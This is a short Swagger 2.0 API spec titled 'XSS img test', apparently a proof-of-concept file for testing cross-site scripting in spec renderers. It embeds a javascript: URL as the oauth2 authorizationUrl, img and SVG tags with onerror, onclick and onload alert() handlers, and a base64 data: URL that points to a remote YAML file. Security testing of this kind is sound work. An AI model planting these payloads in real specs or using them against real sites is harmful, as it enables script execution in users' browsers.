swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "1.0.0"
  title: XSS img test
  description: |
    <img src="https://academy.avast.com/hubfs/New_Avast_Academy/Hackers/Hacker-Hero-a1.png" 
         onclick="alert(2)" 
         onerror="alert(3)">
    <svg xmlns="http://www.w3.org/2000/svg" onload="alert('SVG XSS')">
      <rect width="100" height="100" style="fill:blue;" />
    </svg>
    data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
paths:
  /accountId/1:
    get:
      responses:
        200:
          description: Successful response
